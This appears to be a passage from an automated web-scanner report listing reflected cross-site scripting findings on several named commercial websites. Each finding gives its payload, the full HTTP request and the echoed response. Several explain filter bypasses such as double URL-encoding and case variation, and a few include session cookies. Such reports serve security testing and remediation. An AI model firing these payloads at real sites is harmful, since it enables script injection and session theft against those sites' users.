Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the sn request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9c484'%3balert(1)//bfff91a0391 was submitted in the sn parameter. This input was echoed as 9c484';alert(1)//bfff91a0391 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c0636"><x%20style%3dx%3aexpression(alert(1))>29427ce22fe was submitted in the REST URL parameter 2. This input was echoed as c0636"><x style=x:expression(alert(1))>29427ce22fe in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /find/unsubscribeCatalogs.jspc0636"><x%20style%3dx%3aexpression(alert(1))>29427ce22fe HTTP/1.1 Host: secure.bhphotovideo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!--<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">-->
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c2181%253c%252fscript%253e%253cScRiPt%253ealert%25281%2529%253c%252fScRiPt%253e25aed6d8538 was submitted in the REST URL parameter 2. This input was echoed as c2181</script><ScRiPt>alert(1)</ScRiPt>25aed6d8538 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.
Request
GET /find/unsubscribeCatalogs.jspc2181%253c%252fscript%253e%253cScRiPt%253ealert%25281%2529%253c%252fScRiPt%253e25aed6d8538 HTTP/1.1 Host: secure.bhphotovideo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!--<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">-->
The value of the rg request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7aa20"><script>alert(1)</script>cc8bc4a943f was submitted in the rg parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the divID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 47aa5'%3balert(1)//d192276b303 was submitted in the divID parameter. This input was echoed as 47aa5';alert(1)//d192276b303 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Date: Fri, 30 Sep 2011 12:25:01 GMT Server: Microsoft-IIS/6.0 P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM" X-Powered-By: ASP.NET Content-Type: application/x-javascript Cache-Control: no-store Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Length: 19730
function staticButton(objName,divID,buttonName,buttonId,config,state,butHtmlTemplate,server,site,protocol,servlet,windowWidth,windowHeight){this.CHAT=1;this.VOICE=2;this.BUTTON=1;this.CHATBOX=2;this.T ...[SNIP]... ic)=='undefined') {var lpMTagStatic={};} lpMTagStatic.lpStaticBut13173855011244548345561002503597 = new staticButton('lpMTagStatic.lpStaticBut13173855011244548345561002503597','lpButDivID-130512871949847aa5';alert(1)//d192276b303','Judes Images',12,{'id':12,'name':"Judes Images",chanel:1,enabled:true,buttonType:1,voiceType:-1,stickyType:1,description:"Static Button",buttonContent:2,addTextToButton:false,addTextToButtonText:"Ou ...[SNIP]...
3.346. http://smartparents.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://smartparents.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be38f"><script>alert(1)</script>d5558ed912f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?be38f"><script>alert(1)</script>d5558ed912f=1 HTTP/1.1 Host: smartparents.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp?c1=6&c2=268 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
3.347. http://smartparents.com/favicon.ico [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://smartparents.com
Path:
/favicon.ico
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 83413"><script>alert(1)</script>6c884ff98b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /favicon.ico?83413"><script>alert(1)</script>6c884ff98b=1 HTTP/1.1 Host: smartparents.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the var request parameter is copied into the HTML document as plain text between tags. The payload db541<script>alert(1)</script>b2102473944 was submitted in the var parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /service/api?method=liveclicker.widget.getList&account_id=311&&extra_options=%7B%22ttl%22%3A%223600%22%7D&dim10=1&order=random&status=online&format=json&var=liveclicker.api_res[0]db541<script>alert(1)</script>b2102473944 HTTP/1.1 Host: sv.liveclicker.net Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: */* Referer: http://www.petco.com/?AID=10413444&PID=2537521&cm_mmc=CJ-_-CID-_-2537521-_-10413444 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Fri, 30 Sep 2011 12:05:52 GMT Server: Apache-Coyote/1.1 Vary: Accept-Encoding Content-Type: application/json;charset=utf-8 Connection: close Content-Length: 3688
liveclicker.api_res[0]db541<script>alert(1)</script>b2102473944 = { "widgets" : { "widget" : [ { "widget_id" : "16997", "asset_id" : "28930", "versionNumber" : "1", "title" : "Choosing the Right Home for Your Bird", "length" : "1:13", "rating" : "0", "views" : "15 ...[SNIP]...
The value of the div_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload afae6'%3balert(1)//c977e495a0 was submitted in the div_id parameter. This input was echoed as afae6';alert(1)//c977e495a0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /service/getEmbed?client_id=311&widget_id=16411&player_custom_id=479&width=210&height=158&div_id=cont_mediaplayer_16411afae6'%3balert(1)//c977e495a0 HTTP/1.1 Host: sv.liveclicker.net Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: */* Referer: http://www.petco.com/?AID=10413444&PID=2537521&cm_mmc=CJ-_-CID-_-2537521-_-10413444 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
var xml_16411={"roll_campaign_id": "295", "prerolls": [{ "skip_label": "", "location": "http://hcdn.liveclicker.net/z7a3u7c3/cds/videos/311/33073_1_Flv_320x180_h264.flv", "asset" : "33073-1", "fullscr ...[SNIP]... .split('|'),0,{}));var flashVars_16411; var e=document.createElement('div'); e.id='Liveclicker_video_16411'; e.setAttribute('class','Liveclicker_video'); document.getElementById('cont_mediaplayer_16411afae6';alert(1)//c977e495a0').appendChild(e); function lcwrite_16411() {flashVars_16411 = new Object(); var f_e = ['skinPath','petcebto','accountid',311,'urlaccount','http://www.petco.com','urllogo','http://www.petco.com','accou ...[SNIP]...
3.350. http://sv.liveclicker.net/service/getEmbed [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://sv.liveclicker.net
Path:
/service/getEmbed
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 627f5"%3balert(1)//8807ffa17c4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 627f5";alert(1)//8807ffa17c4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /service/getEmbed?client_id=311&widget_id=18811&width=275&height=190&player_custom_id=429&627f5"%3balert(1)//8807ffa17c4=1 HTTP/1.1 Host: sv.liveclicker.net Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: */* Referer: http://www.petco.com/?AID=10413444&PID=2537521&cm_mmc=CJ-_-CID-_-2537521-_-10413444 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the player_custom_id request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a64df"%3balert(1)//9118063e94 was submitted in the player_custom_id parameter. This input was echoed as a64df";alert(1)//9118063e94 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /service/getEmbed?client_id=311&widget_id=18811&width=275&height=190&player_custom_id=429a64df"%3balert(1)//9118063e94 HTTP/1.1 Host: sv.liveclicker.net Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: */* Referer: http://www.petco.com/?AID=10413444&PID=2537521&cm_mmc=CJ-_-CID-_-2537521-_-10413444 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the ckc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 87e4e"><script>alert(1)</script>d5d9a5d69c was submitted in the ckc parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /webrec/wr.do?client=ARMANIEXCHANGE&sessionId=520E7931-C882-5A58-0CA3-DD8D145EC0E2&ns=1&pt=hcat&categoryname=Womens&ckc=87e4e"><script>alert(1)</script>d5d9a5d69c&mbcc=4F3F8B20-763A-5480-90F3-DFE588224975&lang=en&v=5.0.0&mbts=1317384195289&rf=http%3A%2F%2Fwww.mcafeesecure.com%2Fus%2Fforconsumers%2Fmcafee_certified_sites.jsp&purl=http%3A%2F%2Fwww.armaniexchange.com%2Fcategory%2Fwomens.do HTTP/1.1 Host: t.p.mybuys.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: http://www.armaniexchange.com/category/womens.do Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Fri, 30 Sep 2011 12:04:24 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=ISO-8859-1 Set-Cookie: mbc=""; Domain=.mybuys.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: mbc=i8BaIcPB1wtpmTbFALn6DFkrUKTUrOK/PzhQOKdQFqqgYQmdVeghIQesor0qSXa4LI+57IlYpCk=; Domain=.mybuys.com; Expires=Wed, 18-Oct-2079 15:18:31 GMT; Path=/ Vary: Accept-Encoding P3P: CP="DSP CAO DEVo TAI PSD IVDo IVAo CONo HISo CUR PSA OUR IND NAV COM UNI INT", policyref="/w3c/p3p.xml" Accept-Ranges: bytes Cache-Control: no-store Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT x-cdn: Cotendo Connection: Keep-Alive Content-Length: 326
The value of the vti request parameter is copied into the HTML document as plain text between tags. The payload 96d62<script>alert(1)</script>d7bfbc18e73 was submitted in the vti parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /trackingAPI.js?ai=qq58S2mEuHNcyMUndnIpK+NoJdfVOT1z&evt=21&ri=13200&ii=11280&vti=YUPutwoBC2cAAAx@cYwAAAAAABOUS9tR4FyeWW96d62<script>alert(1)</script>d7bfbc18e73 HTTP/1.1 Host: ts.istrack.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: */* Referer: http://shop.mcafee.com/default.aspx Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Fri, 30 Sep 2011 12:23:09 GMT Server: Apache P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI" Content-Length: 114 Connection: close Content-Type: text/javascript; charset=utf-8
The value of the 320863&click request parameter is copied into the HTML document as plain text between tags. The payload 88767<script>alert(1)</script>512582641e5 was submitted in the 320863&click parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?320863&click=http://adserver.adtechus.com/adlink/5330/1959687/0/225/AdId=2013056;BnId=1;itime=386884446;key=key1+key2+key3+key4;nodecode=yes;link=88767<script>alert(1)</script>512582641e5¶ms=386884446 HTTP/1.1 Host: voken.eyereturn.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://adserver.adtechus.com/adiframe/3.0/5330.1/1959687/0/225/ADTECH;target=_blank;key=key1+key2+key3+key4;grp=[group]
Response
HTTP/1.1 200 OK Server: nginx/0.7.67 Date: Fri, 30 Sep 2011 12:52:47 GMT Content-Type: application/x-javascript Connection: keep-alive Cache-Control: no-cache Pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="NOI DSP NID PSAo PSDa OUR STP IND UNI COM NAV" Set-Cookie: erTok="AwAAAAB6+AQAJBcmAAgAAHv4BAAkFyYABgAA"; Domain=.eyereturn.com; Expires=Sun, 29-Sep-2013 12:52:47 GMT; Path=/ Expires: Fri, 30 Sep 2011 12:52:46 GMT Content-Length: 16715
//<!CDATA[// Copyright eyeReturn Marketing Inc., 2011, All Rights Reserved // er_CID='8793';er_SegID='320863';er_imgSrc='http://resources.eyereturn.com/8793/008793_falling_fruit40-728x90_v1.jpg';er_tokenID='325754';er_wsID='2767';er_RedirURL='http://adserver.adtechus.com/adlink/5330/1959687/0/225/AdId=2013056;BnId=1;itime=386884446;key=key1 key2 key3 key4;nodecode=yes;link=88767<script>alert(1)</script>512582641e5http://www.pcfinancial.ca/easydoesit';er_clickURL='http://adserver.adtechus.com/adlink/5330/1959687/0/225/AdId=2013056;BnId=1;itime=386884446;key=key1 key2 key3 key4;nodecode=yes;link=88767<script> ...[SNIP]...
The value of the 320863&click request parameter is copied into the HTML document as plain text between tags. The payload ccb61<script>alert(1)</script>dad60a824f6 was submitted in the 320863&click parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the jsonpcallback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload f00ae%3balert(1)//483e73d5ace was submitted in the jsonpcallback parameter. This input was echoed as f00ae;alert(1)//483e73d5ace in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
3.357. http://www.abesofmaine.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.abesofmaine.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 46345"><script>alert(1)</script>faae217052f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?46345"><script>alert(1)</script>faae217052f=1 HTTP/1.1 Host: www.abesofmaine.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the group1 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 62321"><script>alert(1)</script>0622e46f7fa was submitted in the group1 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
3.359. http://www.abesofmaine.com/category.do [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.abesofmaine.com
Path:
/category.do
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d512f"><script>alert(1)</script>dd7d784137c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
3.360. https://www.abesofmaine.com/accountMenu.do [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
https://www.abesofmaine.com
Path:
/accountMenu.do
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6973d"><script>alert(1)</script>47a4ff413c3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /accountMenu.do?6973d"><script>alert(1)</script>47a4ff413c3=1 HTTP/1.1 Host: www.abesofmaine.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the query request parameter is copied into the HTML document as plain text between tags. The payload ed906<a%20b%3dc>6e337f98fb4 was submitted in the query parameter. This input was echoed as ed906<a b=c>6e337f98fb4 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The value of the keyword request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 28630"%3balert(1)//f551f39996d was submitted in the keyword parameter. This input was echoed as 28630";alert(1)//f551f39996d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: Apache Vary: Accept-Encoding Content-Length: 115601 Content-Type: text/html;charset=UTF-8 Date: Fri, 30 Sep 2011 12:27:16 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html > <head> <style type="text/css"> body {
...[SNIP]... page_name_es : "ES_SearchPage", // Espanol name of page viewed customer_id : "", // customer identifier page_language_indicator: language_indicator, // EN or ES
search_term : "notebook, lap28630";alert(1)//f551f39996d", // search term entered by customer search_category : "", // category id
The value of the Page request parameter is copied into the HTML document as plain text between tags. The payload fbed7<script>alert(1)</script>33b2c5913b was submitted in the Page parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Merchant2/merchant.mvc?Page=minibasketfbed7<script>alert(1)</script>33b2c5913b&Frame=none&Session_ID= HTTP/1.1 Host: www.flyingmule.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: http://www.flyingmule.com/ Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Fri, 30 Sep 2011 12:24:39 GMT Server: Apache/2.0.52 (CentOS) Set-Cookie: htscallerid=38af55fb912621295cd4a73301f80043; expires=Sat, 29-Sep-2012 12:24:39 GMT; path=/ P3P: CP="NOI DEVa TAIa OUR BUS UNI STA" Content-Type: text/html; charset=ISO-8859-1 Content-Length: 2028
The value of the kw request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bedee'%3balert(1)//e646358c25c72e35d was submitted in the kw parameter. This input was echoed as bedee';alert(1)//e646358c25c72e35d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the origkw request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3c101'%3balert(1)//26f75d693a9 was submitted in the origkw parameter. This input was echoed as 3c101';alert(1)//26f75d693a9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the origkw request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d1999'%3balert(1)//3a901cb32b6 was submitted in the origkw parameter. This input was echoed as d1999';alert(1)//3a901cb32b6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d0a14"><script>alert(1)</script>4b46dabcdac was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /45-years.htmld0a14"><script>alert(1)</script>4b46dabcdac HTTP/1.1 Host: www.hertzfurniture.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: http://www.hertzfurniture.com/ Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: IPE35522=IPE35522; SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil855; kmCheck=49d29d7798654d54983e8f51dfcbc227; kmS6633=8724330e5e1e4e0c9955f42eddb6ccbb; kmE6633=1:0|15247,; kmL6633=1|0|Campaign not provided|AdGroup not provided|Raw Query not available|unk|burp|Raw Query not available; WRUID=410325474.977200202; __utma=1.1833889000.1317384676.1317384676.1317384676.1; __utmb=1.11.9.1317384846493; __utmc=1; __utmz=1.1317384676.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=1.|1=Visitor=1833889000=1
Response
HTTP/1.1 404 Not Found Server: nginx/0.8.53 Date: Fri, 30 Sep 2011 12:35:57 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="NOI NID ADMa OUR IND UNI COM NAV" Cache-Control: private, must-revalidate Set-Cookie: SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil855%2527%2527; path=/ Vary: User-Agent Content-Length: 13703
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 75904<a>ed6b9a31c65 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /45-years.html75904<a>ed6b9a31c65 HTTP/1.1 Host: www.hertzfurniture.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: http://www.hertzfurniture.com/ Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: IPE35522=IPE35522; SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil855; kmCheck=49d29d7798654d54983e8f51dfcbc227; kmS6633=8724330e5e1e4e0c9955f42eddb6ccbb; kmE6633=1:0|15247,; kmL6633=1|0|Campaign not provided|AdGroup not provided|Raw Query not available|unk|burp|Raw Query not available; WRUID=410325474.977200202; __utma=1.1833889000.1317384676.1317384676.1317384676.1; __utmb=1.11.9.1317384846493; __utmc=1; __utmz=1.1317384676.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=1.|1=Visitor=1833889000=1
Response
HTTP/1.1 404 Not Found Server: nginx/0.8.53 Date: Fri, 30 Sep 2011 12:35:58 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="NOI NID ADMa OUR IND UNI COM NAV" Cache-Control: private, must-revalidate Set-Cookie: SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil855%2527%2527; path=/ Vary: User-Agent Content-Length: 13655
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a04b9<a>959a651c2ad was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
